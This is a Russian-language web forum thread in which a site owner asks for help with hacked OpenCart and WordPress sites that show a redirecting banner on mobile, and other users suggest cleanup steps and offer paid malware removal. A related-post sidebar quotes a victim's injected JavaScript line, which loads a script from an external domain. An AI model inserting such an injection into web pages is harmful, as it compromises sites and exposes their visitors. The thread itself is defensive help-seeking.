Перейти к содержанию

Рекомендуемые сообщения

Добрый вечер! Кто сталкивался помогите) Взломали сайты, пока заметил на двух оба на opencart, всего Пять на хостинге. Три на opencart два на wordpress. Недавно установил новый сайт

на OcStore скачивал с форума, шаблон с оф сайта разработчика TechStore. Суть проблемы, когда заходишь на сайт с телефона вылезает на новостной баннер и ведёт по ссылке на Риа новости) И эта зараза переодически пропадает и появляется снова. Кто знает как это лечить? Может кто с этим сталкивался )

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

@alldell , надо смотреть хотя бы Ctrl + U в браузере, потом F12 в нем же, родимом, дальше лезть в первоисточник, удалять. Потом менять все пароли и смотреть что установлено. Тут 50/50, либо модуль дырявый, либо доступы у вас root | 11root22

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
11 минут назад, SooR сказал:

@alldell , надо смотреть хотя бы Ctrl + U в браузере, потом F12 в нем же, родимом, дальше лезть в первоисточник, удалять. Потом менять все пароли и смотреть что установлено. Тут 50/50, либо модуль дырявый, либо доступы у вас root | 11root22

Либо adware дополнение браузера

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
15 минут назад, SooR сказал:

Потом менять все пароли

если рядом стоит вордпресс, можно ставить пароль 123 и не париться

  • +1 2

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Только что, vise сказал:

если рядом стоит вордпресс, можно ставить пароль 123 и не париться

:-D:D

Это точно
Все равно сломают через WP

  • +1 1

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

Думаю я не первый кто с этим сталкивался, может кто подскажет куда стучаться ?

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
5 минут назад, alldell сказал:

Написал хостеру пока молчит

переносите на другой аккуант хостинга магазины да чистите их, хостинг хотел бы, да не сможет написать что вы балбес. если сами не умеете удалять заразу с кода, готовьте кошелек

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
30 минут назад, vise сказал:

если рядом стоит вордпресс, можно ставить пароль 123 и не париться

 

я бы так не бросался словами, не особо разбираясь в вопросе

 

цена вопроса около 20$ за каждый сайт на хосте

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Только что, Tom сказал:

 

айболит не вариант, буквально сегодня свежая версия пропустила 300+ дырок

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

Пять сайтов по 20 $, а оптовикам скидки имеются ))

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
5 минут назад, alldell сказал:

Пять сайтов по 20 $, а оптовикам скидки имеются ))

1 могу в подарок, подробнее в лс

Конечно подробнее после осмотра 

Гарантия 3 месяца 

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

Вы хоть бы URL дали - может это adware браузера (винды) у вас

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
13 минут назад, spectre сказал:

Гарантия 3 месяца 

Продлевается, если че? 8-)

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
1 минуту назад, ibond сказал:

Продлевается, если че? 8-)

Если гарантийный случай происходит даже за 1 день до окончания - +3 месяца 

 

Гарантия работает если не ставили варез и распространяется даже на заражения не связанные с уязвимостью которую лечили

Изменено пользователем spectre

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

Ребята сейчас много не "нароешь" и не стал бы так категорично давать гарантии :)
Это все к вопросу ioncube
Варезники, нулевщики, мудаки, 3.14 ...  могут раскодировать ioncube файл, вшить заразу какую, а потом обратно закодировать и ищи свищи

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

За 4+ года вернул деньги только 1 раз, когда поспешил и не увидел что у человека php 5 2 с парсером на вордпрессе в котором около 1,5 миллионов файлов и половину дряни подсовывают этому парсеру конкуренты, а так все решается, есть же логи что куда стучится, а если нету - делаются

 

Это не самореклама, просто действительно не все так страшно, просто нужно немного иметь опыта в этой теме, причём с нескольких сторон

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

@markimax, иногда люди тонких намеков не понимают, что можно человека загрузить пожизненно на гарантийных условиях. :-D

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Только что, ibond сказал:

@markimax, иногда люди тонких намеков не понимают, что можно человека загрузить пожизненно на гарантийных условиях. :-D

Так грузите, какие проблемы, если есть поток заказов - я готов. Но если вы сами поставите 777 и модуль с феофана то гарантия естественно не работает 

 

А так это типа тонкий треп о том кто что понимает а что нет с целью самовыпендриться

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
2 часа назад, markimax сказал:

Варезники, нулевщики, мудаки, 3.14 ...  могут раскодировать ioncube файл, вшить заразу какую, а потом обратно закодировать и ищи свищи

 

это точно.

встречал подобное.

Раскодированный, нуленый и потом обфусцированный уже, похоже, что нулевщиками.

но это все же негарантийный случай.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
6 часов назад, alldell сказал:

Думаю я не первый кто с этим сталкивался, может кто подскажет куда стучаться ?

 

Мой клиент) Напишите в личку, для начала проверю, всякое может быть.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

Для публикации сообщений создайте учётную запись или авторизуйтесь

Вы должны быть пользователем, чтобы оставить комментарий

Создать учетную запись

Зарегистрируйте новую учётную запись в нашем сообществе. Это очень просто!

Регистрация нового пользователя

Войти

Уже есть аккаунт? Войти в систему.

Войти

  • Похожий контент

    • От ArtemPitov
      498.00 руб
      Скачать/Купить дополнение


      Защита от вирусов и хакеров
      После Нового Года планируется работа над крупным обновлением
       
      Модуль позволит обезопасить ваш интернет-магазин на базе OpenCart 2.х от взлома, обеспечит надежную защиту административной части магазина. Даже если вы случайно попались на уловки мошенников или злоумышленник получил данные для входа - не проблема! Модуль обеспечит надежную защиту, просто настройте модуль и можете забыть о проблемах с безопасностью!
       

       
      Модуль умеет :
      Открывать доступ к административной части магазина по секретному ключу. Пример: www.site.com/admin?my_secret_key. Видео: http://take.ms/NgocS Открывать доступ для разрешенных IP адресов  Добавлять капчу reCaptcha от google при авторизации. Капча усложняет процесс перебора паролей (брута)  
      В планах:
      Добавить 2х этапную авторизацию от google. Усложнить процесс создания секретного ключа  Добавить возможность задавать ссылку для переадресации   
      Лицензия:
      Модуль продается с лицензией на один сайт, одна покупка = один домен Покупая копию модуля вы получаете право только на использование. Распространяя модуль платно или бесплатно вы нарушает лицензию - это грозит обнулением покупки, а так же уголовной ответственность предусмотренной статей 146 УК РФ (Нарушение авторских и смежных прав)  Автор оставляет за собой право изменят условия предоставления лицензии, цену и строк продления дополнения. Все доработки и изменения функционала не входят в стоимость и оплачиваются отдельно. Модуль официально продается только через площадку opencartforum, другое получения дополнения считается не легальным.  
      Тип распространения:
      as is (как есть)  
      Установка:
      Загрузить через стандартный установщик Opencart После установки в настройках магазина появится пункт "Защита админ панели" Важно! Чтобы работала reCaptcha нужно настроить модуль "Дополнения → Captcha → reCaptcha"  Важно! Если у вас переименованная папка admin модуль не будет работать  
      Добавил ArtemPitov Добавлено 14.01.2018 Категория Модули Системные требования PHP 5.4 и выше Сайт разработчика https://pitov.pro Старая цена 498 Метод активации Без активации Ioncube Loader Нет OpenCart 2.3
      2.2
      2.1
      2.0 ocStore 2.3
      2.2
      2.1 OpenCart.Pro, ocShop Opencart.pro 2.3
      Opencart.pro 2.1
      OcShop 2.0.3.х
      Не проверялось  
    • От ArtemPitov
      После Нового Года планируется работа над крупным обновлением
       
      Модуль позволит обезопасить ваш интернет-магазин на базе OpenCart 2.х от взлома, обеспечит надежную защиту административной части магазина. Даже если вы случайно попались на уловки мошенников или злоумышленник получил данные для входа - не проблема! Модуль обеспечит надежную защиту, просто настройте модуль и можете забыть о проблемах с безопасностью!
       

       
      Модуль умеет :
      Открывать доступ к административной части магазина по секретному ключу. Пример: www.site.com/admin?my_secret_key. Видео: http://take.ms/NgocS Открывать доступ для разрешенных IP адресов  Добавлять капчу reCaptcha от google при авторизации. Капча усложняет процесс перебора паролей (брута)  
      В планах:
      Добавить 2х этапную авторизацию от google. Усложнить процесс создания секретного ключа  Добавить возможность задавать ссылку для переадресации   
      Лицензия:
      Модуль продается с лицензией на один сайт, одна покупка = один домен Покупая копию модуля вы получаете право только на использование. Распространяя модуль платно или бесплатно вы нарушает лицензию - это грозит обнулением покупки, а так же уголовной ответственность предусмотренной статей 146 УК РФ (Нарушение авторских и смежных прав)  Автор оставляет за собой право изменят условия предоставления лицензии, цену и строк продления дополнения. Все доработки и изменения функционала не входят в стоимость и оплачиваются отдельно. Модуль официально продается только через площадку opencartforum, другое получения дополнения считается не легальным.  
      Тип распространения:
      as is (как есть)  
      Установка:
      Загрузить через стандартный установщик Opencart После установки в настройках магазина появится пункт "Защита админ панели" Важно! Чтобы работала reCaptcha нужно настроить модуль "Дополнения → Captcha → reCaptcha"  Важно! Если у вас переименованная папка admin модуль не будет работать  
    • От wolfxxx
      Ребята привет, подскажите плииз,
      В общем на хостинге стояла 3 сайта, на 2-их был установлен шаблон с вирусом.
      в итоге их стер.
      Начал проверять 3-ий и выскочила вот такая фигня, кто разбирается подскажите плиииз есть вирус или нет.
       
      Путь Изменение содержимого Размер blABLA/public_html/catalog/model/tool/image.php [x] 1…$height){$image=new Image(DIR_IMAGE.$image_old);$image->resize($width,$height);$image->save(DIR_IMAGE.$image_new);}else{ copy(DIR_IMAGE.$image_old,DIR_IMAGE.$image_new);}}$imagepath_parts=explode('/',$image_new);$new_image=implode('/',array 05/04/2018 20:48:23 1.77 Kb /blABLA/public_html/admin/model/tool/image.php [x] 1…$height){$image=new Image(DIR_IMAGE.$image_old);$image->resize($width,$height);$image->save(DIR_IMAGE.$image_new);}else{ copy(DIR_IMAGE.$image_old,DIR_IMAGE.$image_new);}}$imagepath_parts=explode('/',$image_new);$new_image=implode('/',array 05/04/2018 20:48:19 1.73 Kb blABLA.ru/public_html/catalog/controller/extension/payment/qiwi_rest.php [x] 1…);curl_setopt($ch,CURLOPT_USERPWD,$this->config->get('qiwi_rest_id').":".$this->config->get('qiwi_rest_password'));curl_ setopt($ch,CURLOPT_POSTFIELDS,http_build_query($data));curl_setopt($ch,CURLOPT_RETURNTRANSFER,true);curl_setopt($ch,CUR  

    • От IIIBarsik
      Старый сайт:
      OcStore 1.5 
      Тема стандартная (defaut) 
       
      Сегодня зашел на него, а он грузится почти минуту. Полез смотреть в начале через chrome, что увидел: 
      что то такое (картинка из инета)

      В хидере под тегом <head> был скрипт с ссылкой на на данный ресурс. 
      Побежал в header.tpl (catalog\view\theme\default\template\common) увидел там такую вещь: 
      <?php foreach ($scripts as $script) { ?> <script type="text/javascript" src="<?php echo $script; ?>"></script> <?php } ?> Понимаю, что данная херота может инклудится вот сюда из любого файла
      Нашел ее довольно быстро, а именно в catalog\view\javascript\common.js
      В конце файла была приписка:
      document.write('<script src="https://afrodizinlife.gq"><\x2fscript>'); Собственно вопрос:
      Как такие вещи вообще происходят на opencart?
      P.S. По поводу паролей можно не писать: 
      1. 10 значные с спецсимволами + регистры
      2. В браузере не храню
      3. В FileZilla тоже не храню
      Я, конечно, понимаю, что все зависит от определенной сборки, шаблона и установленного на сайт, но есть ли основные дыры, которые необходимо латать? 
      Или какие то минимумы, что необходимо сделать всем и вся? 
    • От Kompanetsr
      Добрый день!
       
      Ребят, кто понимает, в чем может быть проблема?
      Вы не могли бы взглянуть на сайт, либо взлом, либо проблема с шаблоном... Перед этим всем в карточках товара вылазила ошибка 500
      Пробовали делать Бэк-ап, но на следующий день снова имеем то, что имеем (кривую главную страницу и всё)
      mnogo-mozaiki.ru
       
      Для удобства и быстроты связи можете писать в вотсап 89150803060 Роман
  • Последние посетители   0 пользователей онлайн

    Ни одного зарегистрированного пользователя не просматривает данную страницу

×

Важная информация

На нашем сайте используются файлы cookie и происходит обработка некоторых персональных данных пользователей, чтобы улучшить пользовательский интерфейс. Чтобы узнать для чего и какие персональные данные мы обрабатываем перейдите по ссылке. Если Вы нажмете «Я даю согласие», это означает, что Вы понимаете и принимаете все условия, указанные в этом Уведомлении о Конфиденциальности.